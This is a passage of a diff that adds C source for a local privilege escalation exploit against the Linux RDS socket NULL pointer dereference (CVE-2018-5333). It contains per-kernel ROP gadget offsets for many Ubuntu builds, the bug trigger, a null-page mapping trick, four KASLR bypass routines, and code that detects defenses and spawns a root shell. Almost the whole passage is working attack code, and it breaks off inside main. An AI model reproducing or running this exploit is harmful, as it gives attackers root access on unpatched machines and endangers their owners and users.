+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS  1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_PERF      1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
+
+// Can be overwritten by argv[1]
+char *SHELL = "/bin/sh";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+// kernel target struct, using ROP chain from wbowling's exploit
+struct kernel_info {
+  const char* kernel_version;
+  uint64_t commit_creds;
+  uint64_t prepare_kernel_cred;
+  uint64_t xor_rdi;     //: xor edi, edi ; ret
+  uint64_t mov_rdi_rax; //: mov rdi, rax ; pop rbx ; mov rax, rdi ; pop r12 ; pop rbp ; ret
+  uint64_t xchg_esp;    //: xchg eax, esp ; shr bl, 0xbf ; xor eax, eax ; pop rbp ; ret
+  uint64_t swapgs;      //: swapgs ; pop rbp ; ret
+  uint64_t iretq;       //: iretq
+};
+
+// Targets
+struct kernel_info kernels[] = {
+  { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
+  { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
+  { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
+  { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
+  { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  /* Untested:
+  { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
+  { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-66-generic #87-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-70-generic #91-Ubuntu",   0xa27b0, 0xa2ba0, 0x5d0c5, 0x179847, 0x4070c8, 0x64664, 0x406eb  },
+  { "4.4.0-79-generic #100-Ubuntu",  0xa2800, 0xa2bf0, 0x5d0c5, 0x179a67, 0x408338, 0x64664, 0x7d235  },
+  { "4.4.0-87-generic #110-Ubuntu",  0xa2860, 0xa2c50, 0x5d0c5, 0x179ca7, 0x408768, 0x64694, 0x7d285  },
+  { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
+  { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
+  { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
+  */
+
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
+  { "4.4.0-24-lowlatency #43-Ubuntu",   0xa32e0, 0xa36f0, 0x5e0c5, 0x17b5e7, 0x402958, 0x64d34, 0x7dadc },
+  { "4.4.0-28-lowlatency #47-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b8c7, 0x402f48, 0x64d34, 0x7dadc },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  //{ "4.4.0-34-lowlatency #53-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409088, 0x64d34, 0x7dadc },
+  { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  { "4.8.0-34-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  { "4.8.0-36-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  //{ "4.8.0-39-lowlatency #42~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-41-lowlatency #44~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-42-lowlatency #45~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447428, 0x649f4, 0x4b3e3 },
+  { "4.8.0-44-lowlatency #47~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-45-lowlatency #48~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-46-lowlatency #49~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-56-lowlatency #61~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477f8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
+};
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+// https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+
+#define RAND_SIZE 4096
+
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+#ifndef RDS_CMSG_MASKED_ATOMIC_CSWP
+#  define RDS_CMSG_MASKED_ATOMIC_CSWP 9
+#endif
+#ifndef AF_RDS
+#  define AF_RDS 0x15
+#endif
+
+void trigger_bug()
+{
+  struct sockaddr_in sin;
+  struct msghdr msg;
+  char buf[RAND_SIZE];
+  struct cmsghdr cmsg;
+
+  memset(&sin, 0, sizeof(struct sockaddr));
+  memset(&msg, 0, sizeof(msg));
+  memset(buf, 0x40, sizeof(buf));
+  memset(&cmsg, 0, sizeof(cmsg));
+
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): %m\n");
+    return;
+  }
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons(2000);
+  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+  bind(fd, (struct sockaddr*)&sin, sizeof(sin));
+
+  cmsg.cmsg_len = RAND_SIZE;
+  cmsg.cmsg_type = RDS_CMSG_MASKED_ATOMIC_CSWP;
+  cmsg.cmsg_level = SOL_RDS;
+
+  memcpy(&buf[0], &cmsg, sizeof(cmsg));
+
+  *(uint64_t *)(buf + 0x18) = 0x40404000; /* args->local_addr */
+
+  msg.msg_name = &sin;
+  msg.msg_namelen = sizeof(sin);
+  msg.msg_iov = NULL;
+  msg.msg_iovlen = 0;
+  msg.msg_control = buf;
+  msg.msg_controllen = RAND_SIZE;
+  msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
+
+  sendmsg(fd, &msg, 0);
+}
+
+// * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+
+void map_null() {
+  void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
+    MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (map == MAP_FAILED) {
+    dprintf("[-] mmap(null): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char* path = "/proc/self/mem";
+  int fd = open(path, O_RDWR);
+
+  if (fd == -1) {
+    dprintf("open(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long addr = (unsigned long)map;
+
+  while (addr != 0) {
+    addr -= 0x1000;
+    if (lseek(fd, addr, SEEK_SET) == -1) {
+      dprintf("lseek()\n");
+      exit(EXIT_FAILURE);
+    }
+    char cmd[1000];
+    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    system(cmd);
+  }
+}
+
+// * * * * * * * * * * * * * * * save state * * * * * * * * * * * * * * *
+// https://github.com/vnik5287/kernel_rop
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state() {
+  asm(
+  "movq %%cs, %0\n"
+  "movq %%ss, %1\n"
+  "pushfq\n"
+  "popq %2\n"
+  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
+}
+
+// * * * * * * * * * * * * * * SIGSEGV handler * * * * * * * * * * * * * *
+
+void handler(int signo, siginfo_t* info, void* vcontext) {}
+
+void debug_enable_sigsev_handler() {
+  struct sigaction action;
+  memset(&action, 0, sizeof(struct sigaction));
+  action.sa_flags = SA_SIGINFO;
+  action.sa_sigaction = handler;
+  sigaction(SIGSEGV, &action, NULL);
+}
+
+// * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+static int check_env() {
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): RDS kernel module not loaded?\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char buffer[PROC_CPUINFO_LENGTH];
+  char* path = "/proc/cpuinfo";
+  int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+  if (length == -1) {
+    dprintf("[-] open/read(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  char* found = memmem(&buffer[0], length, "smap", 4);
+  if (found != NULL) {
+    dprintf("[-] SMAP detected, no bypass available\n");
+    exit(EXIT_FAILURE);
+  }
+
+  struct stat st;
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
+  }
+
+  if (stat("/proc/sys/lkrg", &st) == 0) {
+    dprintf("[!] Warning: lkrg is in use\n");
+  }
+
+  return 0;
+}
+
+struct utsname get_kernel_version() {
+  struct utsname u;
+  int rv = uname(&u);
+  if (rv != 0) {
+    dprintf("[-] uname()\n");
+    exit(EXIT_FAILURE);
+  }
+  return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
+
+void detect_versions() {
+  struct utsname u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u.machine, "64") == NULL) {
+    dprintf("[-] system is not using a 64-bit kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (strstr(u.version, "-Ubuntu") == NULL) {
+    dprintf("[-] system is not using an Ubuntu kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char *u_ver = strtok(u.version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return;
+    }
+  }
+
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+unsigned long get_kernel_addr_kallsyms() {
+  FILE *f;
+  unsigned long addr = 0;
+  char dummy;
+  char sname[256];
+  char* name = "startup_64";
+  char* path = "/proc/kallsyms";
+
+  dprintf("[.] trying %s...\n", path);
+  f = fopen(path, "r");
+  if (f == NULL) {
+      dprintf("[-] open/read(%s): %m\n", path);
+      return 0;
+  }
+
+  int ret = 0;
+  while (ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
+      return addr;
+    }
+  }
+
+  fclose(f);
+  dprintf("[-] kernel base not found in %s\n", path);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+
+  if (substr == NULL)
+    return 0;
+
+  char* endptr = &substr[16];
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
+
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+#endif
+
+// * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
+// https://blog.lizzie.io/kaslr-and-perf.html
+
+#if ENABLE_KASLR_BYPASS_PERF
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu, int group_fd, unsigned long flags)
+{
+  return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+unsigned long get_kernel_addr_perf() {
+  int fd;
+  pid_t child;
+
+  dprintf("[.] trying perf_event_open sampling...\n");
+
+  child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork() failed: %m\n");
+    return 0;
+  }
+
+  if (child == 0) {
+    struct utsname self = {0};
+    while (1) uname(&self);
+    return 0;
+  }
+
+  struct perf_event_attr event = {
+    .type = PERF_TYPE_SOFTWARE,
+    .config = PERF_COUNT_SW_TASK_CLOCK,
+    .size = sizeof(struct perf_event_attr),
+    .disabled = 1,
+    .exclude_user = 1,
+    .exclude_hv = 1,
+    .sample_type = PERF_SAMPLE_IP,
+    .sample_period = 10,
+    .precise_ip = 1
+  };
+
+  fd = perf_event_open(&event, child, -1, -1, 0);
+
+  if (fd < 0) {
+    dprintf("[-] syscall(SYS_perf_event_open): %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  uint64_t page_size = getpagesize();
+  struct perf_event_mmap_page *meta_page = NULL;
+  meta_page = mmap(NULL, (page_size * 2), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+  if (meta_page == MAP_FAILED) {
+    dprintf("[-] mmap() failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  if (ioctl(fd, PERF_EVENT_IOC_ENABLE)) {
+    dprintf("[-] ioctl failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+  char *data_page = ((char *) meta_page) + page_size;
+
+  size_t progress = 0;
+  uint64_t last_head = 0;
+  size_t num_samples = 0;
+  unsigned long min_addr = ~0;
+  while (num_samples < 100) {
+    /* is reading from the meta_page racy? no idea */
+    while (meta_page->data_head == last_head);;
+    last_head = meta_page->data_head;
+
+    while (progress < last_head) {
+      struct __attribute__((packed)) sample {
+        struct perf_event_header header;
+        uint64_t ip;
+      } *here = (struct sample *) (data_page + progress % page_size);
+      switch (here->header.type) {
+      case PERF_RECORD_SAMPLE:
+        num_samples++;
+        if (here->header.size < sizeof(*here)) {
+          dprintf("[-] size too small.\n");
+          if (child) kill(child, SIGKILL);
+          if (fd > 0) close(fd);
+          return 0;
+        }
+
+        uint64_t prefix;
+        if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+          prefix = here->ip & ~0xfffff;
+        } else {
+          prefix = here->ip & ~0xffffff;
+        }
+
+        if (prefix < min_addr) min_addr = prefix;
+        break;
+      case PERF_RECORD_THROTTLE:
+      case PERF_RECORD_UNTHROTTLE:
+      case PERF_RECORD_LOST:
+        break;
+      default:
+        dprintf("[-] unexpected perf event: %x\n", here->header.type);
+        if (child) kill(child, SIGKILL);
+              if (fd > 0) close(fd);
+        return 0;
+      }
+      progress += here->header.size;
+    }
+    /* tell the kernel we read it. */
+    meta_page->data_tail = last_head;
+  }
+
+  if (child) kill(child, SIGKILL);
+  if (fd > 0) close(fd);
+  return min_addr;
+}
+#endif
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+unsigned long get_kernel_addr_mincore() {
+  unsigned char buf[getpagesize() / sizeof(unsigned char)];
+  unsigned long iterations = 20000000;
+  unsigned long addr = 0;
+
+  dprintf("[.] trying mincore info leak...\n");
+
+  if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+    dprintf("[-] target kernel does not permit mincore info leak\n");
+    return 0;
+  }
+
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000,
+       PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+    dprintf("[-] mmap(): %m\n");
+    return 0;
+  }
+
+  int i;
+  for (i = 0; i <= iterations; i++) {
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf)) {
+      dprintf("[-] mincore(): %m\n");
+      return 0;
+    }
+
+    int n;
+    for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space */
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
+        addr &= 0xffffffffff000000ul;
+        if (munmap((void*)0x66000000, 0x20000000000))
+          dprintf("[-] munmap(): %m\n");
+        return addr;
+      }
+    }
+  }
+
+  if (munmap((void*)0x66000000, 0x20000000000))
+    dprintf("[-] munmap(): %m\n");
+
+  dprintf("[-] kernel base not found in mincore info leak\n");
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+  unsigned long addr = 0;
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+  addr = get_kernel_addr_kallsyms();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_PERF
+  addr = get_kernel_addr_perf();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+  addr = get_kernel_addr_mincore();
+  if (addr) return addr;
+#endif
+
+  dprintf("[-] KASLR bypass failed, kernel base not found\n");
+  exit(EXIT_FAILURE);
+
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static void shell() {
+  if (getuid() == 0 && geteuid() == 0) {
+    dprintf("[+] got root\n");
+    system(SHELL);
+  } else {
+    dprintf("[-] failed\n");
+  }
+  exit(EXIT_FAILURE);
+}
+
+void fork_shell() {
+  pid_t rv;
+
+  rv = fork();
+  if (rv == -1) {
+    dprintf("[-] fork(): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (rv == 0)
+    shell();
+}
+
+int main(int argc, char *argv[]) {
+  if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
+
+  dprintf("[.] checking kernel version...\n");
+  detect_versions();
+  dprintf("[~] done, version looks good\n");
+
+#if ENABLE_SYSTEM_CHECKS
+  dprintf("[.] checking system...\n");
+  check_env();
+  dprintf("[~] done, looks good\n");
+#endif
+
+  dprintf("[.] mapping null address...\n");
+  map_null();
+  dprintf("[~] done, mapped null address\n");
+
+#if ENABLE_KASLR_BYPASS
+  dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+  KERNEL_BASE = get_kernel_addr();
+  dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+  unsigned long commit_creds =        (KERNEL_BASE + kernels[kernel].commit_creds);
+  unsigned long prepare_kernel_cred = (KERNEL_BASE + kernels[kernel].prepare_kernel_cred);
+  unsigned long xor_rdi =             (KERNEL_BASE + kernels[kernel].xor_rdi);
